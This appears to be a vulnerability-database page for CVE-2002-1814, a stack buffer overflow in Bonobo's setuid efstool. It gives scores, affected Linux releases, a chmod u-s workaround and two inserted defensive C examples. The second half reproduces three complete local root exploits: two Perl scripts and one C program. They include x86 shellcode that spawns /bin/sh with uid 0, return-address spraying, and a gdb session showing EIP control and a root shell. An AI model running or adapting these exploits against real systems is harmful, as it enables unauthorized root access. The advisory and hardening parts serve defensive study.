CVE-2002-1814
CVSS 4.6
Published: 2002-12-31 00:00:00
Revised: 2008-09-05 16:31:35

[Original] Buffer overflow in efstools in Bonobo, when installed setuid, allows local users to execute arbitrary code via long command line arguments.


[CNNVD] Bonobo EFSTool Command-Line Argument Local Buffer Overflow Vulnerability (CNNVD-200212-741)

efstool is an EFS file manipulation tool for Linux.
efstool does not properly bounds-check user-supplied command-line arguments, so a local attacker may exploit this flaw to mount a buffer overflow attack.
A local attacker can pass an overly long string as an argument to the efstool program, causing it to segfault; because efstool is installed setuid root by default, carefully crafted string data lets the attacker execute arbitrary commands on the system with root privileges.
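The bug class the description above refers to, an unchecked copy of a command-line argument into a fixed-size stack buffer, shown beside a bounds-checked replacement that rejects over-long input instead of overflowing. This is an added example and not efstool's source (which the page does not show); the buffer size ARG_MAX_LEN, the function names and the constructed argv are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <errno.h>

#define ARG_MAX_LEN 64   /* hypothetical size of the fixed stack buffer */

/* Vulnerable pattern: strcpy() copies until the caller-chosen NUL, so any
 * argument of ARG_MAX_LEN bytes or more runs past the end of dst. Kept only
 * to identify the defect; nothing else in this file calls it. */
void copy_arg_unchecked(char dst[ARG_MAX_LEN], const char *arg)
{
    strcpy(dst, arg);
}

/* Hardened replacement: locate the terminator within dst_size bytes before
 * copying anything. Returns 0 on success, -1 with errno = E2BIG when the
 * argument plus its NUL does not fit. memchr() is bounded by dst_size, so
 * the length check itself cannot walk off the end of the destination. */
int copy_arg_checked(char *dst, size_t dst_size, const char *arg)
{
    const char *nul = memchr(arg, '\0', dst_size);
    if (nul == NULL) {
        errno = E2BIG;
        return -1;
    }
    memcpy(dst, arg, (size_t)(nul - arg) + 1);   /* includes the NUL */
    return 0;
}

/* Stands in for the tool's argument loop: copies each argument that fits the
 * stack buffer, rejects the rest, and returns the number accepted. */
int accept_args(int argc, char *const argv[])
{
    char buf[ARG_MAX_LEN];
    int accepted = 0;
    for (int i = 1; i < argc; i++) {
        if (copy_arg_checked(buf, sizeof buf, argv[i]) == 0) {
            accepted++;
        } else {
            fprintf(stderr, "argument %d rejected: %zu bytes, limit is %zu\n",
                    i, strlen(argv[i]), sizeof buf - 1);
        }
    }
    return accepted;
}

/* Constructed sample run: one short argument and one 2688-byte argument,
 * the length that crashed efstool in the gdb session further down the page.
 * Returns how many of the two were accepted (1). */
int sample_run(void)
{
    static char longarg[2688 + 1];
    memset(longarg, 'A', 2688);
    longarg[2688] = '\0';
    char *argv[] = { "efstool", "short", longarg, NULL };
    return accept_args(3, argv);
}

int main(void)
{
    printf("%d of 2 arguments accepted\n", sample_run());
    return 0;
}
```

The point of the hardened version is that the length decision is made against the destination's size, not the source's, and that an oversize argument becomes an ordinary error return rather than a write past the frame.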
        

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required]

- CPE (affected platforms and products)

cpe:/o:redhat:linux:6.2::alpha
cpe:/o:redhat:linux:7.1::alpha
cpe:/o:redhat:linux:6.2::sparc
cpe:/o:redhat:linux:7.0::sparc
cpe:/o:slackware:slackware_linux:8.0  (Slackware Linux 8.0)
cpe:/a:gnome:bonobo
cpe:/o:mandrakesoft:mandrake_linux:8.0  (MandrakeSoft Mandrake Linux 8.0)
cpe:/o:mandrakesoft:mandrake_linux:7.1  (MandrakeSoft Mandrake Linux 7.1)
cpe:/o:redhat:linux:7.1::ia64
cpe:/o:redhat:linux:7.0::i386
cpe:/o:redhat:linux:7.1::i386
cpe:/o:mandrakesoft:mandrake_linux:9.0  (MandrakeSoft Mandrake Linux 9.0)
cpe:/o:redhat:linux:6.2::i386
cpe:/o:redhat:linux:7.0::alpha
cpe:/o:mandrakesoft:mandrake_linux:8.0::ppc

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1814
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1814
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-741
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/5125
(UNKNOWN)  BID  5125
http://www.securiteam.com/exploits/5AP0E0K8AO.html
(UNKNOWN)  MISC  http://www.securiteam.com/exploits/5AP0E0K8AO.html
http://www.iss.net/security_center/static/9451.php
(UNKNOWN)  XF  linux-efstool-bo(9451)

- Vulnerability information

Bonobo EFSTool Command-Line Argument Local Buffer Overflow Vulnerability
Medium severity  Boundary condition error
2002-12-31 00:00:00 2005-10-20 00:00:00
Local
        

- Advisories and patches

Temporary workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measure to reduce the threat:
* Until the vulnerability is patched, temporarily remove the setuid bit from the efstool program with chmod u-s.
Vendor patches:
RedHat
------
The vendor has not yet released a patch or upgrade; users of this software are advised to monitor the vendor's home page for the latest version:

http://www.ximian.com/devzone/tech/bonobo.html
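A programmatic form of the check behind the workaround above: whether a binary is installed setuid root (the property that turns this local overflow into a root shell), and clearing only that bit, which is what chmod u-s does. This is an added example, not the advisory's or the vendor's code; the path /usr/bin/efstool is taken from the exploit later on the page, and the temporary file used by self_check() is constructed for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <sys/stat.h>

/* Returns 1 if path is a regular file with the set-user-ID bit, 0 if not,
 * -1 if it cannot be stat()ed (for example, the tool is not installed). */
int is_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (S_ISREG(st.st_mode) && (st.st_mode & S_ISUID)) ? 1 : 0;
}

/* Returns 1 only for the combination the advisory describes: setuid AND
 * owned by root. 0 otherwise, -1 on stat() failure. */
int is_setuid_root(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (S_ISREG(st.st_mode) && (st.st_mode & S_ISUID) && st.st_uid == 0) ? 1 : 0;
}

/* Programmatic `chmod u-s path`: clears S_ISUID and keeps every other
 * permission bit. Returns 0 on success, -1 on failure. */
int drop_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return chmod(path, (st.st_mode & 07777) & ~S_ISUID);
}

/* Self-check on a constructed file standing in for /usr/bin/efstool: set the
 * bit, observe it, drop it, observe it gone. Returns 1 if every step behaves. */
int self_check(void)
{
    const char *path = "/tmp/efstool_setuid_demo.tmp";   /* constructed, removed below */
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return 0;
    fclose(f);
    int ok = chmod(path, 04755) == 0
          && is_setuid(path) == 1
          && drop_setuid(path) == 0
          && is_setuid(path) == 0;
    remove(path);
    return ok;
}

int main(void)
{
    const char *efstool = "/usr/bin/efstool";
    switch (is_setuid_root(efstool)) {
    case 1:  printf("%s is setuid root: apply the workaround (chmod u-s)\n", efstool); break;
    case 0:  printf("%s is installed but not setuid root\n", efstool); break;
    default: printf("%s is not present\n", efstool); break;
    }
    printf("self-check %s\n", self_check() ? "passed" : "failed");
    return 0;
}
```

Reading the mode back with stat() before calling chmod() is what keeps the other bits intact; passing a fixed mode such as 0755 would also work for efstool but silently alters any binary whose permissions differ from that default.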

- Vulnerability information (21583)

Mandrake 7/8/9,RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (1) (EDBID:21583)
linux local
2002-06-29 Verified
0 clorox
N/A
source: http://www.securityfocus.com/bid/5125/info

Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems.

A boundary condition error has been discovered in the efstool program. Due to improper bounds checking, it is possible for a user to supply a long command-line argument to the efstool program, which would result in a buffer overflow. This problem could be exploited on the local system to overwrite stack memory, including the return address, and execute attacker-supplied code.

#!/usr/bin/perl
# efstool root exploit
# written by clorox of Ptrac Networks for BKACC(Bored Kids At ComputerCamp)
# give the campers internet grogan!
#
# tested to work on slackware 8, mandrake 8, mandrake 7.1
# tweaks may be needed on the offset
# method 1 works more often but
# method 2 is faster but not too good
#
#
# enjoy -clorox
# perl efs.pl -1000

$shellcode =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
"\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
"\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
"\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
"/bin/sh";

$shellcode2 =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88".
"\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3".
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31".
"\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
"\xff\xff/bin/sh";

$ret = "0xbfffe890";
$offset = $ARGV[0];
$nop = "\x90";

if ($ARGV[1] eq "m1") {
        $len = 3000;
        for ($i = 0; $i < ($len - length($shellcode)); $i++) {
                $buffer .= $nop;
        }
        $buffer .= $shellcode;
} elsif ($ARGV[1] eq "m2") {
        $len = 10010;
        for ($i = 0; $i < ($len - length($shellcode)); $i++) {
                $buffer .= $nop;
        }
        $buffer .= $shellcode2;
} else {
        print "You must specify a method fool!\n";
        print "perl $0 <offset> m1 or m2\n";
}

$buffer .= pack('l', ($ret + $offset));
$buffer .= pack('l', ($ret + $offset));
exec("efstool $buffer");
# and on the seventh day clorox said "LET THERE BE SHELL!"
		

- Vulnerability information (21584)

Mandrake 7/8/9,RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (2) (EDBID:21584)
linux local
2002-06-29 Verified
0 andrea lisci
N/A
source: http://www.securityfocus.com/bid/5125/info
 

#!/usr/bin/perl
# efstool root exploit
# written by andrea lisci
# perl efstool.pl 3000

$shellcode =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89".
"\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3".
"\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29".
"\xc0\x40\xcd\x80\xe8\xde\xff\xff\xff".
"/bin/sh";

$ret = "0xbfffe984";
$offset = $ARGV[0];
$nop = "\x90";


 $buffer="'";
        $len = 2652;
        for ($i = 0; $i < $len; $i++) {
                $buffer .= $nop;
        }
 $buffer .= pack('l', ($ret + $offset));

  for ($i = 0; $i < 10000; $i++) {
                $buffer .= $nop;
         }

        $buffer .= $shellcode;
 $buffer .="'";


exec("efstool $buffer");
		

- Vulnerability information (21585)

Mandrake 7/8/9,RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (3) (EDBID:21585)
linux local
2002-06-29 Verified
0 N4rK07IX
N/A
source: http://www.securityfocus.com/bid/5125/info
  

/*
    Author: N4rK07IX
    narkotix@linuxmail.org || kayaem@itu.edu.tr (I think this is a useless pop3 box, never checked, inbox is out of memory)

**Vulnerability: The vulnerability is OLD and out of date. Mandrake Linux 9.0 "efstool"  libefs1-1.0.20-4mdk  local stack overflow.

[narkotix@labs c-hell]$ efstool `perl -e 'print "A"x2688'`
Segmentation fault
[narkotix@labs c-hell]$
(gdb) r `perl -e 'print "A"x2688'`
Starting program: /usr/bin/efstool `perl -e 'print "A"x2688'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info r
eax            0xa      10
ecx            0xa      10
edx            0x4f4c4554       1330398548
ebx            0x41414141       1094795585
esp            0xbfffe780       0xbfffe780
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
eflags         0x210286 2163334
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0

[narkotix@labs c-hell]$ ./env  <----- This puts the sh3llc0de, padded with 0x90s, into the environment
[narkotix@labs c-hell]$ efstool `perl -e 'print "\x1c\xfd\xff\xbf" x 672'`
sh-2.05b# id
uid=0(root) gid=0(root) groups=501(narkotix)
sh-2.05b#
Exploited on Mandrake Linux 9.0 in 2003 <--- old history :p
efstool must be suid to get uid 0, but I saw on many systemz it is not suided; on my system it is.
Maybe while I was asleep my mom suided it :P

[narkotix@labs c-hell]$ make efs_n4
cc     efs_n4.c   -o efs_n4
[narkotix@labs c-hell]$ ./efs_n4
sh-2.05b# id
uid=0(root) gid=0(root) groups=501(narkotix)
sh-2.05b#

Scriptkiddi3Z I'm sorry, this is not an 0Hday;
the efstool bug is out of fashion. I forgot to release this shit a year ago,
but today I found it in my toolz directory. N0w it is fr33...

Greetz: EFnet , laplace_ex , math_monkey,deathmann,ISLAM Nation,EnderUNIX team(Turk BSD crew)
Shoutz: Hi bigmutant , is da default configregister 0x2102 on your cisco1700 ??

Last Words: laplace_ex, I need to drop one course; I'll be waiting in the hydraulics laboratory on Friday.
            Your Motorola 68000 book is still with me, I'll bring that too ---> Duel next week :P
*/



#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFFERSIZE 2688

static char hell_code[] = //52 bytes sh3llc0de

        //* setreuid(0,0);
        "\x31\xc0"                      // xor    %eax,%eax
        "\x31\xdb"                      // xor    %ebx,%ebx
        "\x31\xc9"                      // xor    %ecx,%ecx
        "\xb0\x46"                      // mov    $0x46,%al
        "\xcd\x80"                      // int    $0x80

        /* setgid(0); */
        "\x31\xdb"                      // xor %ebx,%ebx
        "\x89\xd8"                      // mov %ebx,%eax
        "\xb0\x2e"                      // mov $0x2e,%al
        "\xcd\x80"                      // int $0x80

        // execve /bin/sh
        "\x31\xc0"                      // xor    %eax,%eax
        "\x50"                          // push   %eax
        "\x68\x2f\x2f\x73\x68"          // push   $0x68732f2f
        "\x68\x2f\x62\x69\x6e"          // push   $0x6e69622f
        "\x89\xe3"                      // mov    %esp,%ebx
        "\x8d\x54\x24\x08"              // lea    0x8(%esp,1),%edx
        "\x50"                          // push   %eax
        "\x53"                          // push   %ebx
        "\x8d\x0c\x24"                  // lea    (%esp,1),%ecx
        "\xb0\x0b"                      // mov    $0xb,%al
        "\xcd\x80"                      // int    $0x80

        // exit();
        "\x31\xc0"                      // xor    %eax,%eax
        "\xb0\x01"                      // mov    $0x1,%al
        "\xcd\x80";                     // int    $0x80


int main(void) //Th3 l3ss c0d3,th3 b3st performance..
{       printf("Mandrake Linux 9.0 efstool local xploit written by N4rK07IX\n");
        printf("=> narkotix@linuxmail.org\n");
        char *env[2] = {hell_code, NULL};
        char buffer[BUFFERSIZE];

        int i;
        int *lamepointer = (int *)(buffer );

        int ret_addr = 0xbffffffa - strlen(hell_code) - strlen("/usr/bin/efstool");


        for (i = 0; i < BUFFERSIZE-1 ; i += 4)
                *lamepointer++ = ret_addr;

        /* execle() only returns when it fails, so reaching perror() is the error path */
        execle("/usr/bin/efstool", "efstool", buffer, NULL,env);
        perror("execle()");
        return(0);
}

		

- Vulnerability information

59768
Bonobo efstools Command Line Argument Handling Local Overflow
Local Access Required Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2002-06-28 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete
 

 
